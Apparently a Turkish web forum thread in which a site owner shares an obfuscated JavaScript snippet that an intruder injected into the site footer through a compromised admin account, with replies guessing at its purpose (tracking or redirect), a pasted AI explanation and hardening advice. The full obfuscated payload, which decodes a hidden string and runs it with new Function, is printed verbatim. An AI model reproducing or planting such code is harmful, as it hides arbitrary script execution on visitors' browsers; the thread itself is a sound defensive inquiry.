Admin Panelde bulduğum Şifreli Javascript kodu

Arkadaşlar selamlar, bugün çeşitli analizler yaparken admin panel üzerinden eklenmiş bir javascript koduna denk geldim. Kod şifreli bir şekilde eklenmişti. Ön tarafta footer taginden önce ki alana otomatik olarak ekleniyordu bu kod.

Analiz ettiğim zaman fransa ovh dabir vps kullanılarak admin panele patronun hesabı üzerinden giriş yapılmış ve kod enjekte edilmişti. Kodu analiz etmeye çalıştım fakat tek anlayabildiğim Google Tag manager gibi bir sisteme bilgi göndermesiydi.

Aşağıda ki şifreli kodun ne işe yaradığını tam olarak açıklayabilcek birisi var mı?

Yardımlarınız için teşekkürler.

function _0x5d77(){var _0x4cd320=['WPO6fW/dKmonWQa','WPr1rGPzW4vqWQFcT2a','W6dcOCoVWOaCoWPr','c8keia','lmoyjeiWW7aVo3eUWQVdOKpdHCkpbCoihrxdNmkMW7SvW5ZdMNW9WPnZqCk9WO9TWRVcMW55W4idWP7cQZ7dMCkMi8oYjSkWWP5EnrPRdvVdLZ5gWOHWW4BdLSkLWP7dTSkdcSktC8oFWR8raCoWW53dOmoJWQNdJSoHW4ZdRSoDb8kCySosWQ/cRd3cHw40hs5YW67cTN1JqevvWQ7dL3qEuHxcGmkTvwJcPbfJBZCjW659uJpcQ29Glc3dVCovWPi8W54HWR/cRCkxWOyba8oTWQldJbKXW6PkWQiAW5TzuSoZW6JdLc0bW5JcVW0jW6RcN8ovDNOYBCoxASoDW7xdQCkRawFcUWyTW5PDW4ddSHxcHSkbW7b8eYJcQMDVWOJcMmk/W5NcKSkYbcRcOZFdJ31JDaBcSmkVWPNdNCkoE8oHrbH8W4NdJIW5bHuoWPHvxchcRCkQWQ0zWObwW7VdJM/dQSoBWP3dV8kPWRTtWPtdIq/cMvvxumkUdmosASktbmkPw1HpW75/WO8TihpcNLOSru3cTKLeWRj4katcQWJcLmktWQBdI20viCoSmHnKjSo1gSk8la9SWQZdLfaFjCkQW5pcPrFcUCk3c0FcLSk8oeG+WPNcGsdcOSk2jCktsghdJZlcOSkFcI7cJCoAW5hcUmoBq8oiEYNdISojzmo3WRFcQ8oCvKbzbISqbCoqW4BdTmkammoaegpdGmkVWRGbkmoqW5BcSrS','ESk0WQFdPdfrW53dUb3dJ2LnW7G','b8o+m8ohW7b4WPe','hqhdLtFcI8kbxCk5tIhdNxO','uufjlCox','sd7cM8oUW5r9m8kbWQ3dVa','FZL6jrm','WPBcKmohkmk3W7lcMG4','W7lcNrpdG8oRW406WQ9ay8k1','sCoghmkvWR7cTX7cNmoWWQBcRa','W59VC8oVw8oyW55hiM3cIs0','W5TQCSoKvCoAW5vMhvhcIH0','W7/dH8osWOFcHJ1H','dIlcHmkV','BcpcO8oyW5/dRc7dQ0BdGJtcQq','Fmk3WOddV8ogACk4n1NcQCooaq','WO93W6BcQY7dL8k0WQemWQRdUmoiWRO','WQRdG03cMW','x8k6cCkxALpcS8kdWRxcNmkdEa','f8oNDXrYW65KW7uor8oEW6/dRW','W6pcRCkYW4nbad1QWP1MpG','mLJcQI3cPa','WR5MDCkxCW','rCkNcsziWOP2stfGWORcHq','WR/dH8oAWOBcLW','eSoNCXb3W6LIW442wmohW43dLa'];_0x5d77=function(){return _0x4cd320;};return _0x5d77();}var _0x562e2d=_0x5eb7;function _0x5eb7(_0x1902d6,_0x3b53d6){var _0x5d77f2=_0x5d77();return _0x5eb7=function(_0x5eb7f8,_0x434726){_0x5eb7f8=_0x5eb7f8-0x1ba;var _0x3d3ffe=_0x5d77f2[_0x5eb7f8];if(_0x5eb7['hOLFGn']===undefined){var _0x1f9d9a=function(_0x20b9eb){var _0x2a93b0='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x1d20c8='',_0x18d83d='';for(var _0x4023bb=0x0,_0x3bdb84,_0x280e0e,_0x32f650=0x0;_0x280e0e=_0x20b9eb['charAt'](_0x32f650++);~_0x280e0e&&(_0x3bdb84=_0x4023bb%0x4?_0x3bdb84*0x40+_0x280e0e:_0x280e0e,_0x4023bb++%0x4)?_0x1d20c8+=String['fromCharCode'](0xff&_0x3bdb84>>(-0x2*_0x4023bb&0x6)):0x0){_0x280e0e=_0x2a93b0['indexOf'](_0x280e0e);}for(var _0x56b92a=0x0,_0xc49220=_0x1d20c8['length'];_0x56b92a<_0xc49220;_0x56b92a++){_0x18d83d+='%'+('00'+_0x1d20c8['charCodeAt'](_0x56b92a)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x18d83d);};var _0x5d611a=function(_0x473ada,_0x3db9d7){var _0xf028bd=[],_0x10f792=0x0,_0x4b73f9,_0x2478be='';_0x473ada=_0x1f9d9a(_0x473ada);var _0x1953b8;for(_0x1953b8=0x0;_0x1953b8<0x100;_0x1953b8++){_0xf028bd[_0x1953b8]=_0x1953b8;}for(_0x1953b8=0x0;_0x1953b8<0x100;_0x1953b8++){_0x10f792=(_0x10f792+_0xf028bd[_0x1953b8]+_0x3db9d7['charCodeAt'](_0x1953b8%_0x3db9d7['length']))%0x100,_0x4b73f9=_0xf028bd[_0x1953b8],_0xf028bd[_0x1953b8]=_0xf028bd[_0x10f792],_0xf028bd[_0x10f792]=_0x4b73f9;}_0x1953b8=0x0,_0x10f792=0x0;for(var _0x100a9f=0x0;_0x100a9f<_0x473ada['length'];_0x100a9f++){_0x1953b8=(_0x1953b8+0x1)%0x100,_0x10f792=(_0x10f792+_0xf028bd[_0x1953b8])%0x100,_0x4b73f9=_0xf028bd[_0x1953b8],_0xf028bd[_0x1953b8]=_0xf028bd[_0x10f792],_0xf028bd[_0x10f792]=_0x4b73f9,_0x2478be+=String['fromCharCode'](_0x473ada['charCodeAt'](_0x100a9f)^_0xf028bd[(_0xf028bd[_0x1953b8]+_0xf028bd[_0x10f792])%0x100]);}return _0x2478be;};_0x5eb7['PVWSna']=_0x5d611a,_0x1902d6=arguments,_0x5eb7['hOLFGn']=!![];}var _0x5f1aab=_0x5d77f2[0x0],_0x4d7249=_0x5eb7f8+_0x5f1aab,_0x4c6310=_0x1902d6[_0x4d7249];return!_0x4c6310?(_0x5eb7['yqcfRR']===undefined&&(_0x5eb7['yqcfRR']=!![]),_0x3d3ffe=_0x5eb7['PVWSna'](_0x3d3ffe,_0x434726),_0x1902d6[_0x4d7249]=_0x3d3ffe):_0x3d3ffe=_0x4c6310,_0x3d3ffe;},_0x5eb7(_0x1902d6,_0x3b53d6);}(function(_0x5ac0c2,_0x5cdba1){var _0x166d6d=_0x5eb7,_0x3f7064=_0x5ac0c2();while(!![]){try{var _0x5a11d6=parseInt(_0x166d6d(0x1c7,'6lBZ'))/0x1+parseInt(_0x166d6d(0x1bd,'9YC9'))/0x2*(parseInt(_0x166d6d(0x1bf,'*&Ih'))/0x3)+parseInt(_0x166d6d(0x1c6,'7F2O'))/0x4+parseInt(_0x166d6d(0x1d4,'Q!0c'))/0x5+parseInt(_0x166d6d(0x1be,'9YC9'))/0x6+parseInt(_0x166d6d(0x1bb,'fdal'))/0x7*(-parseInt(_0x166d6d(0x1cf,'6lBZ'))/0x8)+parseInt(_0x166d6d(0x1d3,'DZ#N'))/0x9*(-parseInt(_0x166d6d(0x1cc,'7F2O'))/0xa);if(_0x5a11d6===_0x5cdba1)break;else _0x3f7064['push'](_0x3f7064['shift']());}catch(_0x1bc2f2){_0x3f7064['push'](_0x3f7064['shift']());}}}(_0x5d77,0x351fa),!function(_0x5e7852,_0x5f54c4){var _0x393e8c={'KHGqe':function(_0x47c868,_0x305000){return _0x47c868%_0x305000;}};!function(_0x32dc2f){var _0x1b2825=_0x5eb7,_0x3bbb5e={'SkNHn':function(_0x16597f,_0x385dcb){var _0x2d507a=_0x5eb7;return _0x393e8c[_0x2d507a(0x1d5,'jlQd')](_0x16597f,_0x385dcb);}},_0x19be35=function(_0x30fe9b,_0x1feeab){var _0xcdd244=_0x5eb7,_0xc48a2a={'Ptnie':function(_0x3c4312,_0x441caf){var _0x50bcd5=_0x5eb7;return _0x3bbb5e[_0x50bcd5(0x1c8,'LlOW')](_0x3c4312,_0x441caf);}};return _0x30fe9b[_0xcdd244(0x1c9,'O%gR')]('')[_0xcdd244(0x1d0,'S%Wm')](function(_0x2c5497,_0x3c36b7){var _0x3b4e5c=_0xcdd244;return String[_0x3b4e5c(0x1c1,'iO7J')](_0x2c5497[_0x3b4e5c(0x1d6,'%tF!')](0x0)^_0x1feeab[_0x3b4e5c(0x1ce,'RwZ*')](_0xc48a2a[_0x3b4e5c(0x1d7,'0GiV')](_0x3c36b7,_0x1feeab['length'])));})[_0xcdd244(0x1c0,'JqSm')]('');}(_0x32dc2f[_0x1b2825(0x1cb,'*&Ih')]('')['reverse']()[_0x1b2825(0x1c4,'fdal')](''),_0x5f54c4);new Function(_0x19be35)();}(_0x5e7852);}(_0x562e2d(0x1d1,'!D%*'),'gtag'));

Google izleme kodu obfuscation ile gizlenmiş gibi duruyor

Projeniz de gtag.js tarzında bir dosya var mı?

https://bit.ly/3zW5Z7P buraya siteyi yönlendirme kodu grok çözdü link patlak çalışmıyor


https://grok.com/share/bGVnYWN5LWNvc...3-13740dd7a522

Gönderdiğiniz kod bir JavaScript parçasıdır ve genellikle bir web sitesinin arka planında çalışır. Ancak, bu kodun ana amacı okunmasını ve anlaşılmasını zorlaştırmaktır. Bu tekniğe obfuscation (gizleme) denir.
Kodun Amacı ve İşlevi
Bu kodun ne yaptığına dair kesin bir şey söylemek oldukça zor çünkü gizlenmiş. Fakat, genel yapısına bakıldığında şunlar çıkarılabilir:
* Gizleme (Obfuscation): Kod, değişken adlarını anlaşılmaz hale getirilmiş (_0x5d77, _0x4cd320, _0x562e2d gibi) ve metin dizileri bir dizi içinde saklanmış. Ardından bu dizideki elemanlar, karmaşık matematiksel işlemler ve işlevler aracılığıyla şifreleniyor. Bu, kodu tersine mühendislikle çözmeyi zorlaştırmak için yapılan yaygın bir tekniktir.
* Fonksiyon Yapısı: Kod, _0x5d77 ve _0x5eb7 gibi iç içe geçmiş fonksiyonlar kullanıyor. Bu fonksiyonlar, şifrelenmiş metin dizilerini çözmek ve asıl işlevi yerine getirmek için gerekli altyapıyı oluşturuyor.
* Potansiyel İşlevler: Bu tür gizlenmiş kodlar genellikle şunlar için kullanılır:
* Reklam Takibi: Kullanıcı davranışlarını izlemek ve hedeflenmiş reklamlar sunmak.
* Analiz: Site trafiğini veya kullanıcı etkileşimlerini analiz etmek.
* Zararlı Yazılım: Bazen kötü niyetli amaçlarla (örneğin, başka bir zararlı kod indirmek veya kullanıcı verilerini çalmak) kullanılabilir.
Neden Gizlenmiş?
Kodun bu şekilde gizlenmesinin birkaç nedeni olabilir:
* Fikri Mülkiyetin Korunması: Yazılımın arkasındaki algoritmanın veya iş mantığının başkaları tarafından kolayca kopyalanmasını engellemek.
* Güvenlik: Kötü niyetli kişilerin kodun nasıl çalıştığını anlamasını zorlaştırarak bir güvenlik katmanı eklemek.
* Zararlı Amaçlar: Kodun kötü amaçlı olduğunu gizlemek ve güvenlik yazılımları tarafından tespit edilmesini zorlaştırmak.
Özetle, gönderdiğiniz kod okunabilirliği kasten düşürülmüş bir JavaScript parçasıdır. Büyük ihtimalle bir web sitesi veya bir reklam platformu tarafından bir görevi yerine getirmek için kullanılıyor. Bu tür kodları internet üzerinde, özellikle reklam ağlarında veya üçüncü taraf analiz hizmetlerinde görmek oldukça yaygındır. Ancak, içeriği net olmadığı için potansiyel riskleri de b
arındırabilir.

Kodlara sızılmış gibi görünüyor, panelin güvenlik adımları zayıf anlaşılan. Bu tarz js kodları genelde xxx sitelerine yönlendirme yapar. Sistemi indirip vs code ile genel bir tarayın, benzer kodlar eklenmişmi bi arama yapın. Sonra bunu nasıl yaptıklarını tespit edip açığı kapatmanız gerek. Genelde upload fonksiyonları & veri girişlerini kontrol etmeniz gerek.

Kod manuel olarak admin panel üzerinden eklenmiş hocam. Kod veritabanında tutuluyor ve güncelleme tarihi belli.

Temmuz ayının başında sızma testi gerçekleştirdik ve çoğu zaafiyeti kapattık. Ya şifre sızdırıldı ya da cookie çalındı. CSRF'den şüpheleniyorum aslında ama login bilgilerinin çalınmış olması daha büyük ihtimal gibi geliyor.

Gtag.js mevcut fakat bizim yapıya ait, ayrıca bizim verilerde de bir sapma yok açıkcası. Anladığım kadarıyla direkt olarak kendi hesabına bu kodları çekiyordu. Analiz etme amacıyla kullanılmış olabilir.

Linki ancak buraya kadar takip edebildim açıkcası.

Grookun mantığına göre otomatik olarak site başka bir adrese yönleniyor olması gerekiyordu fakat bu durum mevcut değil.

Olabilir binbir ihtimal var gerçekten. CSRF token'ı aktif kullanmanız gerek o zaman. Gerekirse de login ekranlarında mail ile kod doğrulaması yaptırın. En önemlisi dosyaları baştan aşağıya bi tarayın, genelde bir zip dosyası yüklerler. o da sürekli dosyalara bulaşır durur.

Problem yok hocam google analytics kullanmış, kullandığı key'in ifşa olmaması için de şifreleme yapmış